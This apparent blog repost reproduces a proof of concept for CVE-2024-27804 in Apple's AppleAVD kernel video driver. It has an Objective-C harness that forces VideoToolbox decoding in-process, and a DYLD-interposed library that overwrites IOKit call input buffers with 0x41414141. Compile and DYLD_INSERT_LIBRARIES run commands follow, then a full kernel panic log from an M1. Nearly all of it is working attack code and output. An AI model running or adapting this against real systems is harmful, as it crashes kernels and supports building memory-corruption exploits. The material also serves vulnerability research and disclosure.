AppleAVD

IoT 2个月前 admin

23 0 0

https://github.com/R00tkitSMM/CVE-2024-27804

tested on M1

// vtdecode.m 
#include <dlfcn.h>
#include <stdio.h>
#import <AVFoundation/AVFoundation.h>

typedef void (*t_VTApplyRestrictions)(int arg);
t_VTApplyRestrictions VTApplyRestrictions;

int __attribute__((noinline)) fuzz(const char *filename) {
  @autoreleasepool {
    NSError *error = nil;
    NSURL *fileURL = [NSURL
        fileURLWithPath:[NSString stringWithCString:filename
                                           encoding:NSASCIIStringEncoding]];
    AVAsset *asset = [AVAsset assetWithURL:fileURL];
    if (asset == nil)
      return 0;

    AVAssetReader *reader = [[AVAssetReader alloc] initWithAsset:asset
                                                           error:&error];
    if (reader == nil)
      return 0;

    NSArray *tracks = [asset tracksWithMediaType:AVMediaTypeVideo];
    if (tracks == nil || ([tracks count] == 0))
      return 0;

    AVAssetTrack *track = tracks[0];

    NSDictionary *outputSettings = [NSDictionary
        dictionaryWithObject:[NSNumber numberWithInt:kCMPixelFormat_32BGRA]
                      forKey:(id)kCVPixelBufferPixelFormatTypeKey];
    AVAssetReaderTrackOutput *output = [AVAssetReaderTrackOutput
        assetReaderTrackOutputWithTrack:track
                         outputSettings:outputSettings];

    [reader addOutput:output];
    [reader startReading];

    for (int frame = 0; frame < 2; frame++) {
      // printf("Frame %d\n", frame);

      CMSampleBufferRef sampleBuffer = [output copyNextSampleBuffer];
      if (sampleBuffer == nil)
        break;

      CMSampleBufferInvalidate(sampleBuffer);
      CFRelease(sampleBuffer);
      sampleBuffer = NULL;
    }
  }

  return 1;
}

int main(int argc, const char *argv[]) {
  if (argc < 2) {
    printf("Usage: %s <filename>\n", argv[0]);
    return 0;
  }

  // make decoding run in the current process instead of VTDecoderXPCService
  void *toolbox = dlopen("/System/Library/Frameworks/VideoToolbox.framework/"
                         "Versions/A/VideoToolbox",
                         RTLD_NOW);
  if (!toolbox) {
    printf("Error loading library\n");
    return 0;
  }
  VTApplyRestrictions =
      (t_VTApplyRestrictions)dlsym(toolbox, "VTApplyRestrictions");
  if (!VTApplyRestrictions) {
    printf("Error finding VTApplyRestrictions symbol\n");
    return 0;
  }
  VTApplyRestrictions(1);

  fuzz(argv[1]);

  return 0;
}

// flip.c
#include <IOKit/IOKitLib.h>
#include <dlfcn.h>
#include <execinfo.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/sysctl.h>
#include <time.h>

void flip_bit(void *buf, size_t len) {

  if (!len)
    return;
  size_t offset = rand() % len;

  ((int *)buf)[offset] = 0x41414141;
}

kern_return_t fake_IOConnectCallMethod(mach_port_t connection,
                                       uint32_t selector, uint64_t *input,
                                       uint32_t inputCnt, void *inputStruct,
                                       size_t inputStructCnt, uint64_t *output,
                                       uint32_t *outputCnt, void *outputStruct,
                                       size_t *outputStructCntP) {

  flip_bit(inputStruct, inputStructCnt);

  return IOConnectCallMethod(connection, selector, input, inputCnt, inputStruct,
                             inputStructCnt, output, outputCnt, outputStruct,
                             outputStructCntP);
}

typedef struct interposer {
  void *replacement;
  void *original;
} interpose_t;

__attribute__((used)) static const interpose_t interposers[]
    __attribute__((section("__DATA,__interpose"))) = {
        {.replacement = (void *)fake_IOConnectCallMethod,
         .original = (void *)IOConnectCallMethod}};

clang -arch arm64 -o vtdecode vtdecode.m -framework VideoToolbox -framework Foundation -framework CoreMedia  -framework CoreVideo -framework  AVFoundation
clang -dynamiclib -o flip.dylib flip.c -framework IOKit

DYLD_INSERT_LIBRARIES=./flip.dylib ./vtdecode input_poc/orientation-normal-fragmented.mp4.mov

panic(cpu 4 caller 0xfffffe0026851cdc): Unaligned kernel data abort. at pc 0xfffffe0026aed514, lr 0xfffffe0026aed5d8 (saved state: 0xfffffe3a396e3200)
	  x0:  0x000000000000000e x1:  0xfffffe1002bdc01b  x2:  0x0000000000000000  x3:  0xfffffe3a396e3444
	  x4:  0xfffffe3a396e344c x5:  0x000000000002d1f4  x6:  0x0000000000000000  x7:  0xffffffffffffffff
	  x8:  0x0000000000000004 x9:  0xfffffe1002bdc01f  x10: 0x0000000000000000  x11: 0x0000000000000002
	  x12: 0x0000000000000004 x13: 0x0000000000000000  x14: 0x0000000000000000  x15: 0x0000000000000000
	  x16: 0xfffffe0026aeda90 x17: 0xfffffe0026aed9fc  x18: 0x0000000000000000  x19: 0xfffffe1b40e90000
	  x20: 0x0000000000000000 x21: 0x0000000000000000  x22: 0xfffffe1002bdc000  x23: 0x0000000000000001
	  x24: 0x0000000000000000 x25: 0xfffffe1002bdc024  x26: 0x000000000000001b  x27: 0x00000000000008b0
	  x28: 0x000000000000001b fp:  0xfffffe3a396e3610  lr:  0xfffffe0026aed5d8  sp:  0xfffffe3a396e3550
	  pc:  0xfffffe0026aed514 cpsr: 0x60401208         esr: 0x96000021          far: 0xfffffe1002bdc01b

Debugger message: panic
Memory ID: 0x6
OS release type: User
OS version: 23C71
Kernel version: Darwin Kernel Version 23.2.0: Wed Nov 15 21:53:34 PST 2023; root:xnu-10002.61.3~2/RELEASE_ARM64_T8103
Fileset Kernelcache UUID: 6DAC2CF8E68E8F436296A697E29AAD44
Kernel UUID: E245D804-1FA3-31E2-90BC-B4DF75B2129E
Boot session UUID: 52885412-0864-4DFF-8E9E-36C3C7BC8B88
iBoot version: iBoot-10151.61.4
secure boot?: YES
roots installed: 0
Paniclog version: 14
KernelCache slide: 0x000000001dac4000
KernelCache base:  0xfffffe0024ac8000
Kernel slide:      0x000000001dacc000
Kernel text base:  0xfffffe0024ad0000
Kernel text exec slide: 0x000000001efd8000
Kernel text exec base:  0xfffffe0025fdc000
mach_absolute_time: 0x1c4f4c5a5
Epoch Time:        sec       usec
  Boot    : 0x65a56518 0x000b7c0f
  Sleep   : 0x00000000 0x00000000
  Wake    : 0x00000000 0x00000000
  Calendar: 0x65a5664f 0x00072ae4

Zone info:
  Zone map: 0xfffffe100f2dc000 - 0xfffffe300f2dc000
  . VM    : 0xfffffe100f2dc000 - 0xfffffe14dbfa8000
  . RO    : 0xfffffe14dbfa8000 - 0xfffffe1675940000
  . GEN0  : 0xfffffe1675940000 - 0xfffffe1b4260c000
  . GEN1  : 0xfffffe1b4260c000 - 0xfffffe200f2d8000
  . GEN2  : 0xfffffe200f2d8000 - 0xfffffe24dbfa4000
  . GEN3  : 0xfffffe24dbfa4000 - 0xfffffe29a8c70000
  . DATA  : 0xfffffe29a8c70000 - 0xfffffe300f2dc000
  Metadata: 0xfffffe3a1c3ac000 - 0xfffffe3a243ac000
  Bitmaps : 0xfffffe3a243ac000 - 0xfffffe3a27194000
  Extra   : 0 - 0

CORE 0 recently retired instr at 0xfffffe00261886e4
CORE 1 recently retired instr at 0xfffffe00261886e4
CORE 2 recently retired instr at 0xfffffe00261886e4
CORE 3 recently retired instr at 0xfffffe00261886e4
CORE 4 recently retired instr at 0xfffffe0026186ee8
CORE 5 recently retired instr at 0xfffffe00261886e4
CORE 6 recently retired instr at 0xfffffe00261886e4
CORE 7 recently retired instr at 0xfffffe00261886e4
TPIDRx_ELy = {1: 0xfffffe1b448bd030  0: 0x0000000000001004  0ro: 0x000000010061c320 }
CORE 0 PVH locks held: None
CORE 1 PVH locks held: None
CORE 2 PVH locks held: None
CORE 3 PVH locks held: None
CORE 4 PVH locks held: None
CORE 5 PVH locks held: None
CORE 6 PVH locks held: None
CORE 7 PVH locks held: None
CORE 0: PC=0xfffffe002606ff30, LR=0xfffffe002606ff30, FP=0xfffffe3a39a13ef0
CORE 1: PC=0xfffffe002606ff30, LR=0xfffffe002606ff30, FP=0xfffffe3a392b7ef0
CORE 2: PC=0xfffffe002606ff30, LR=0xfffffe002606ff30, FP=0xfffffe3a37df7ef0
CORE 3: PC=0xfffffe002606ff30, LR=0xfffffe002606ff30, FP=0xfffffe3a37c8fef0
CORE 4 is the one that panicked. Check the full backtrace for details.
CORE 5: PC=0xfffffe002606ff34, LR=0xfffffe002606ff30, FP=0xfffffe3a39033ef0
CORE 6: PC=0xfffffe002606ff34, LR=0xfffffe002606ff30, FP=0xfffffe3a39893ef0
CORE 7: PC=0xfffffe002606ff34, LR=0xfffffe002606ff30, FP=0xfffffe3a396a7ef0
Compressor Info: 3% of compressed pages limit (OK) and 2% of segments limit (OK) with 0 swapfiles and OK swap space
Panicked task 0xfffffe1b46695e18: 14298 pages, 13 threads: pid 2352: vtdecode
Panicked thread: 0xfffffe1b448bd030, backtrace: 0xfffffe3a396e2930, tid: 184820
		  lr: 0xfffffe0026035568  fp: 0xfffffe3a396e29c0
		  lr: 0xfffffe002617fa24  fp: 0xfffffe3a396e2a30
		  lr: 0xfffffe002617de84  fp: 0xfffffe3a396e2b20
		  lr: 0xfffffe0025fe3b68  fp: 0xfffffe3a396e2b30
		  lr: 0xfffffe0026034e48  fp: 0xfffffe3a396e2ee0
		  lr: 0xfffffe002684726c  fp: 0xfffffe3a396e2f00
		  lr: 0xfffffe0026851cdc  fp: 0xfffffe3a396e3080
		  lr: 0xfffffe002617f890  fp: 0xfffffe3a396e30f0
		  lr: 0xfffffe002617e138  fp: 0xfffffe3a396e31e0
		  lr: 0xfffffe0025fe3b68  fp: 0xfffffe3a396e31f0
		  lr: 0xfffffe0026aed5d8  fp: 0xfffffe3a396e3610
		  lr: 0xfffffe0026ad6fe4  fp: 0xfffffe3a396e3720
		  lr: 0xfffffe0026ad66b4  fp: 0xfffffe3a396e3790
		  lr: 0xfffffe0026ad4e48  fp: 0xfffffe3a396e37d0
		  lr: 0xfffffe00267a0168  fp: 0xfffffe3a396e3810
		  lr: 0xfffffe00267a0484  fp: 0xfffffe3a396e39a0
		  lr: 0xfffffe002614b294  fp: 0xfffffe3a396e3ac0
		  lr: 0xfffffe002603bce8  fp: 0xfffffe3a396e3b60
		  lr: 0xfffffe002600edd4  fp: 0xfffffe3a396e3bc0
		  lr: 0xfffffe00260273f8  fp: 0xfffffe3a396e3c60
		  lr: 0xfffffe0026027864  fp: 0xfffffe3a396e3d50
		  lr: 0xfffffe0026173698  fp: 0xfffffe3a396e3e20
		  lr: 0xfffffe002617e18c  fp: 0xfffffe3a396e3f10
		  lr: 0xfffffe0025fe3b68  fp: 0xfffffe3a396e3f20
      Kernel Extensions in backtrace:
         com.apple.driver.AppleAVD(737.1)[63D957B3-2E48-36EA-880C-6F0BE3DE16A6]@0xfffffe0026a37e00->0xfffffe0026b04b43
            dependency: com.apple.driver.AppleARMPlatform(1.0.2)[9FC0A536-5BC6-33D5-911A-5A46BDDBBCEF]@0xfffffe00269dfe20->0xfffffe0026a3295b
            dependency: com.apple.driver.FairPlayIOKit(71.3.0)[AD212727-D14F-3DA2-8974-6CEA43B45BC1]@0xfffffe0027e23b50->0xfffffe0027f19aef
            dependency: com.apple.iokit.CoreAnalyticsFamily(1)[0896C7D3-89F2-3D56-A301-5CB0FE0BBEAC]@0xfffffe0027cb1f60->0xfffffe0027cb9d4b
            dependency: com.apple.iokit.IOSurface(352.0.3)[0351AFC2-D85C-3BB5-B9C6-C8C0F6C7A01D]@0xfffffe00288a7dc0->0xfffffe00288d85ab